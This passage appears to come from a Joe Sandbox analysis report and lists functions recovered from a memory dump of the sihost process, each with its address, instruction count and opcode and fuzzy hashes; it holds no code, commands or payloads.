              • Instruction ID: 054f009b24253829dbe43f4cb7dac878bc96aaea81cd02eb8e5b4d47ab74101b
              • Opcode Fuzzy Hash: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction Fuzzy Hash: 93313EF5D0A51E8BEB66DB30C8587FDB7B1BF15300F5042B9C94E92291DE79AD488B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C458 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed14eac043560e325ff6decbc390efeaeb4175bc94eb30bf76a674fc239b0471
              • Instruction ID: 0156d05306abee27697143069903fabd028f9ca4aa825f92e2b67e732e7942ad
              • Opcode Fuzzy Hash: ed14eac043560e325ff6decbc390efeaeb4175bc94eb30bf76a674fc239b0471
              • Instruction Fuzzy Hash: 0621B9F6D0965E4AEB52BBBDE4080FE7BD0DF45320F000536DA09C1096DF25B88E8590
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5A0E1 Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 41d88ddcc77c113e01b4b339ba51fe87fc29e651f0d11bc6d352a5c0e399d25e
              • Instruction ID: f6893802060b9e5f589bf3c05510341293cb0bd2201ccf8ea9d404877bcc181f
              • Opcode Fuzzy Hash: 41d88ddcc77c113e01b4b339ba51fe87fc29e651f0d11bc6d352a5c0e399d25e
              • Instruction Fuzzy Hash: F4214DB0918A4D8FDB89EF28C4996BD3BE0FF68305F0101AAE909D7251DB35E955CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5A735 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4381d8f98cb059adacfc64ff25f46fa98f81f3566a1111ae63521e95c0252043
              • Instruction ID: 6d9bbbef397efd75a97642d963f8b98901c62d0cba787539a363be0f6eabc1a1
              • Opcode Fuzzy Hash: 4381d8f98cb059adacfc64ff25f46fa98f81f3566a1111ae63521e95c0252043
              • Instruction Fuzzy Hash: 32210BF6D152599AEB04EF78EC895FD33A0EF44314B040077DA5DCA1D2EB35A94D8790
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5A705 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15ae5dbf16bfd6c78b9486f3ad2d0c7fe8315bb1d7ce37aac11a17501c8e4249
              • Instruction ID: 71c7e8256786bcd49d20f7b4c045e50821da093086429408c4ca636bf02cd262
              • Opcode Fuzzy Hash: 15ae5dbf16bfd6c78b9486f3ad2d0c7fe8315bb1d7ce37aac11a17501c8e4249
              • Instruction Fuzzy Hash: EB112375A1552E8ADB08EB78E8091FD73A0FF48325F10043BE90EC6491DF32E549CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5AA90 Relevance: .1, Instructions: 68COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c67ca938a549270bfc8edfb2d30e0e81004af24d7758f6a20f5ac88010562a05
              • Instruction ID: dfb86de99010ab88e70049590cc4337265d3aa0aa09d8d1f903558008c5c495c
              • Opcode Fuzzy Hash: c67ca938a549270bfc8edfb2d30e0e81004af24d7758f6a20f5ac88010562a05
              • Instruction Fuzzy Hash: ED21DFE4D1965E8EF756EB78C8491BD3FE0EF45300F0405B3DA48D60A2EE28AC688790
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50D0D Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e3a7a1a2f576e1a94f0fbee933e8425eda30876887221aa75a7a0a00169bd9a4
              • Instruction ID: 43971ff1bbdc3ebecced418413846fddca555faaf1283c825a44a9758d50bc67
              • Opcode Fuzzy Hash: e3a7a1a2f576e1a94f0fbee933e8425eda30876887221aa75a7a0a00169bd9a4
              • Instruction Fuzzy Hash: 4211C4B1C1964D4FEB9ADB78C85D3B87BA0FF15310F0005BEC909C6492DE76A848C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF59C7D Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0940536b3ccf488ef91a37cf3da4276649ff8f6be4f4b85f19e1e9a1032c907d
              • Instruction ID: a45477d6ee7049be337b482f29f817fab67ae242eb5918e74d0d83b82aca54e6
              • Opcode Fuzzy Hash: 0940536b3ccf488ef91a37cf3da4276649ff8f6be4f4b85f19e1e9a1032c907d
              • Instruction Fuzzy Hash: 8B1151B090864E8FDB89EF28C45C6A93BE1FF68301F0005AAD409C7161CB31E955CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50AED Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16d6f9d9b31308fba21c931879ef0eddbaccae5486f6dd85033bee8fcdfa444b
              • Instruction ID: 846c2e9bdd7799710253dd14e39bdd9d52a82259e0e751ffe3f9b93acfe7befa
              • Opcode Fuzzy Hash: 16d6f9d9b31308fba21c931879ef0eddbaccae5486f6dd85033bee8fcdfa444b
              • Instruction Fuzzy Hash: E5118EB1E0980D8BEB55EB60C899BEEB3A1EF54300F104275C50AD7195CE38A989CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF53415 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 99c8fe75659257a4a9c194372c8f8006d2cd80c12da2e360c389bd58e833caf7
              • Instruction ID: 3c50a6eea2ff05690119795c16a5d7d1a348714484dccf29446bdff8a64e5429
              • Opcode Fuzzy Hash: 99c8fe75659257a4a9c194372c8f8006d2cd80c12da2e360c389bd58e833caf7
              • Instruction Fuzzy Hash: 881182B090964D8FDB96DF7CC4591BD7BA0FF14301F4005BED919C6191DB35A948C710
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5BC69 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fde0e694bba52209440572c8e28e08114ed18293699fb6d668647757f32e257e
              • Instruction ID: 5eef86c5621848582a3ad00f53f2adad4de305561d09a48d23fe9e2c264cb9a2
              • Opcode Fuzzy Hash: fde0e694bba52209440572c8e28e08114ed18293699fb6d668647757f32e257e
              • Instruction Fuzzy Hash: D011A0B0809A4D8FEB86EF34C85D2B93BF0FF29300F4004BAD919C6192DE36A944C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C069 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfe873bcd1099fc9c17fd539532c76798e532cd71ca50685a5d08b6ae47b8787
              • Instruction ID: f93320c59145b6bb603e0d84b4d927b93d100a849595025d08fa1a5a4d579e8b
              • Opcode Fuzzy Hash: bfe873bcd1099fc9c17fd539532c76798e532cd71ca50685a5d08b6ae47b8787
              • Instruction Fuzzy Hash: A311E5B190964E8FDB9AEF34C4592B93FB0FF59301F5001BED90AC7092CA35A959C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5B895 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9940b6f56e5b2cce4d9116d37e6e68af28b6e9c805825a12d0761bbe0429f08c
              • Instruction ID: 955470973f5ef2105cacc9b2b3197fd77c3758936b20c1a7bf54b2f53f22682c
              • Opcode Fuzzy Hash: 9940b6f56e5b2cce4d9116d37e6e68af28b6e9c805825a12d0761bbe0429f08c
              • Instruction Fuzzy Hash: 0D118EB0909A5D8FEB99EF38C45D2BD7BA0FF18302F0004BAD90AC6191DB36A945C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52D61 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 11c05139a689ded18338155b8687a202a8277ab9bc99aa29f9798ed73d1d773c
              • Instruction ID: 8d8b2c42ea5be12b2ed4744df28c72cfc95c18aaefab5cf38d9bb44a5e17a39c
              • Opcode Fuzzy Hash: 11c05139a689ded18338155b8687a202a8277ab9bc99aa29f9798ed73d1d773c
              • Instruction Fuzzy Hash: 3901DFB0C1964E4FE7A2EB38C44C6E97BE0EF59300F4106B6D908C60A2EE38E948C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5ABA5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9faafd662310781514e91f65068ba0a6bf669c607c5c6778af7e1294be3288a7
              • Instruction ID: b30d0951ef6315fe8dec19099d7a52b6dd5ae3912db5081c25d4386053aa6991
              • Opcode Fuzzy Hash: 9faafd662310781514e91f65068ba0a6bf669c607c5c6778af7e1294be3288a7
              • Instruction Fuzzy Hash: E4016DB0D1954E5FE752EB34C84D1B97BE1FF59300F0015B6DA08D60A2EA29E8688680
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF505F1 Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93ae57165a9269564c3e5be6351ad2dfe132743ba71812e28b115863cf09a867
              • Instruction ID: 5c897004bd1ca639bd76d4609936fc3bc12dacc51f3691718ef43e0cfec2ad3d
              • Opcode Fuzzy Hash: 93ae57165a9269564c3e5be6351ad2dfe132743ba71812e28b115863cf09a867
              • Instruction Fuzzy Hash: F901D4F191960E4FE792EB78C48D2A97BF0EF98300F5104B5D908C3092DE38E948CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF553FA Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 20a1b18b8de1be8296f72ef1842a43377d3f5be516191f1b4c8ceb03ad33f63a
              • Instruction ID: 19799e53eaa19d3c1cccbc48f70aa933bd89a3390448f149da2655b986d427b4
              • Opcode Fuzzy Hash: 20a1b18b8de1be8296f72ef1842a43377d3f5be516191f1b4c8ceb03ad33f63a
              • Instruction Fuzzy Hash: B82158B491962ECFDB69CB64C9947A873B1EB44301F1041FAC50EA3381DB35AD89CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF501D0 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8dd0334068e42a08b5a67b574b1fb5b5b9b4da91dd64ef83f690269cf708394
              • Instruction ID: d42beaeb44e0979cae767f14516ac7cc98a3aa754525bef847ea5ea46072279f
              • Opcode Fuzzy Hash: b8dd0334068e42a08b5a67b574b1fb5b5b9b4da91dd64ef83f690269cf708394
              • Instruction Fuzzy Hash: 370180B090950D8EDF99EF38C4496BA77A1EF58305F50847AD80EC2190CE32B955CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5A4C9 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e13b78751ba605c16b9e44b8227d84b8a454dc6aa687c8ad8c96fb9e7acb6cf2
              • Instruction ID: 233e4b3617a3e746d1047308b9153636d3fdc4df4d2c7b58fb7414a921a9cb6c
              • Opcode Fuzzy Hash: e13b78751ba605c16b9e44b8227d84b8a454dc6aa687c8ad8c96fb9e7acb6cf2
              • Instruction Fuzzy Hash: 0C01C0B090968D4FDB5ADB74C86D2B97FA0EF19300F4104FFD90AC6092DE2AA868C710
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5A8C8 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c45f916c26cd548e69d035f405785f915762ecb41ea891a1bbeb2bf41716937c
              • Instruction ID: 4940a876c05a2fe6a219beda9ec7bc1aee967facc5a7c2a355694031a9c512d3
              • Opcode Fuzzy Hash: c45f916c26cd548e69d035f405785f915762ecb41ea891a1bbeb2bf41716937c
              • Instruction Fuzzy Hash: 8C014CB091595E9EEB85EB78C44D6BA77E0FF18300F20047AD81AD2190DF32A954CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52DD9 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7b2bc46619ede94b5fdd36eea308311f8699740964c7e359841f8fa715619736
              • Instruction ID: 56e9f67c4a4bf27d9f950ecdeb7808b1745cd50ba055c911212e06eaea9f71af
              • Opcode Fuzzy Hash: 7b2bc46619ede94b5fdd36eea308311f8699740964c7e359841f8fa715619736
              • Instruction Fuzzy Hash: 52018FB191E64D4FE753EB74C88D1E97FE0EF5A301F050AB6D908C70A2DA29E8588711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF57459 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9e502ce91d1e83983d409c1d2dc53989810eef44a53f41e89418dd862f7481f
              • Instruction ID: 46c28b0c137d00a5129fd084e2b474acee6c4f43b38a6d3e079ff24c2cb08687
              • Opcode Fuzzy Hash: a9e502ce91d1e83983d409c1d2dc53989810eef44a53f41e89418dd862f7481f
              • Instruction Fuzzy Hash: 14112EB4E096198FDBA5DB24C8847E977B4EB18301F1041EAD50D93345DA399F89CF54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C538 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8648a67b3a6c51da68c7d5dcac4b6dbf1bd963b993b492fb2cb5f882dc1792a5
              • Instruction ID: d098fdc69cade870ed81638e8ef90297d732d6282c109dbcb6d70d39a8df772f
              • Opcode Fuzzy Hash: 8648a67b3a6c51da68c7d5dcac4b6dbf1bd963b993b492fb2cb5f882dc1792a5
              • Instruction Fuzzy Hash: 66018BB1C19A4E8EEB95AEB8C8491FA3FE0EF19301F00053AEE0AC2091DB3199588640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF508EF Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c38bac523d386c19e7697b38fd4f6951a7ddd97d9437e3af42ddf1b6f223d0ff
              • Instruction ID: 2415bb28a81e45e8b0a24649dbf6f849469fa4c17cb6bbc49cd3a2b3aff283fd
              • Opcode Fuzzy Hash: c38bac523d386c19e7697b38fd4f6951a7ddd97d9437e3af42ddf1b6f223d0ff
              • Instruction Fuzzy Hash: 7801FDB2C0880D4EEF49EB74C499AE9B7A2FF18310F0541B5C60AD71A6CD24A88A8B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5332B Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d257ece706e39671a4f96567061f96a29da238d2d8e1a1a7ca72ed155ed88281
              • Instruction ID: 8989fa30e025d1b87a70a6f1dff22db7bb37b994195fe282794fb6fa85887efc
              • Opcode Fuzzy Hash: d257ece706e39671a4f96567061f96a29da238d2d8e1a1a7ca72ed155ed88281
              • Instruction Fuzzy Hash: 7A014BB0D1891E9EEB91FB7CC88C2BA7BE4FF58301F500976E918C21A1EE35E5588750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5273D Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c683e661f9a54103675ee5327e26f0ba0b6d96105ee78a3aa19a63b569cda0e7
              • Instruction ID: a9b2b968c7fcee6ca6134cd8ec3af152237061846401f3c0d29227f983a40508
              • Opcode Fuzzy Hash: c683e661f9a54103675ee5327e26f0ba0b6d96105ee78a3aa19a63b569cda0e7
              • Instruction Fuzzy Hash: 0901A2B091E64E4FE752EB74C85C1B97BE0FF59300F4545B6DA08C70A2EE35E8488741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5A629 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2aeff3156cf49ed78031683b7489282207aafa032b8d13264ec373e045b3dc07
              • Instruction ID: 3c70511d6791a13617b059d18e3c23983643462422a6499d996d2e8c85e91f22
              • Opcode Fuzzy Hash: 2aeff3156cf49ed78031683b7489282207aafa032b8d13264ec373e045b3dc07
              • Instruction Fuzzy Hash: 43015EA095E68E4EE752EB34885D1B97BF0EF59300F4509F7D908C70A2DA25E8588711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50200 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d181d2342366835da2ed2c5cb29255612e7ec1e17427ddc2cefcaca17981c0d
              • Instruction ID: 6935b80b2d0261898a2c43e11b120badc478fa614d96a07a0152dc284e5d3f9c
              • Opcode Fuzzy Hash: 4d181d2342366835da2ed2c5cb29255612e7ec1e17427ddc2cefcaca17981c0d
              • Instruction Fuzzy Hash: 7C0169B0819A0E8AEB59EB34C4582BD77A0FF18305F50097EE90EC61D2DF36A995CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50208 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dde3a0f1839f505d531d7ac5fe1340d53d14f94bc775f74ad31d611e91870daf
              • Instruction ID: 283473a1fcae19c0482a0cb7660e045889ca2bd60b74a9c3591d01a43f3138e3
              • Opcode Fuzzy Hash: dde3a0f1839f505d531d7ac5fe1340d53d14f94bc775f74ad31d611e91870daf
              • Instruction Fuzzy Hash: E30169B0819A1E8FEB59EB74D45D2BA77A0FF18304F50097EE90EC2191DF36A959CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF517BD Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cdfc92053739aa9465018772d93aab9eea8b82a95c558a5f73e0160db450b60
              • Instruction ID: d1a84afbb9cecdb920b6cfd8f2a9a340cf36e8c59e3591a307e6370eef493c7f
              • Opcode Fuzzy Hash: 6cdfc92053739aa9465018772d93aab9eea8b82a95c558a5f73e0160db450b60
              • Instruction Fuzzy Hash: BA01D1B080968D8FDF95DF38D4592BA3BE0EF65301F4040BAE909C2092DB7AE854C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50D20 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d6525229f62a73c8265ea96fb4f311c0e4e5dd1445b39bdde90db6c079d1f0b
              • Instruction ID: 652468ac641aaaee9cab5cad1e372b55f4336350a5d775b56a79fe8a0b380192
              • Opcode Fuzzy Hash: 8d6525229f62a73c8265ea96fb4f311c0e4e5dd1445b39bdde90db6c079d1f0b
              • Instruction Fuzzy Hash: E2F0F4B1C2954E4AEBA59678D80C3F9B7A0FF15314F00057ADC0DC1481CF7669488201
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF501C8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cb4fb5e80fd9a34fc4b8bbaf56091d6153f5c06bb4a44cf62b7bfe41dd4b61a
              • Instruction ID: f80fe69ef82f453e18a8cff048a17f8994fb0ef19e3c759dc1d163f399e1a4bb
              • Opcode Fuzzy Hash: 7cb4fb5e80fd9a34fc4b8bbaf56091d6153f5c06bb4a44cf62b7bfe41dd4b61a
              • Instruction Fuzzy Hash: C2F0AFB080950E8FEF95EE38D4492FA37A4EF15304F40447AE90EC2081CA36E894CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52659 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0060f18194bb97d2ab3c6c41876e0a51c7fd10ffb5151f3cdb689c193f438106
              • Instruction ID: c865cdf8e3b89b330148d8ff50cbde1b182c2caee6fa49871b8c452d5cdbbe48
              • Opcode Fuzzy Hash: 0060f18194bb97d2ab3c6c41876e0a51c7fd10ffb5151f3cdb689c193f438106
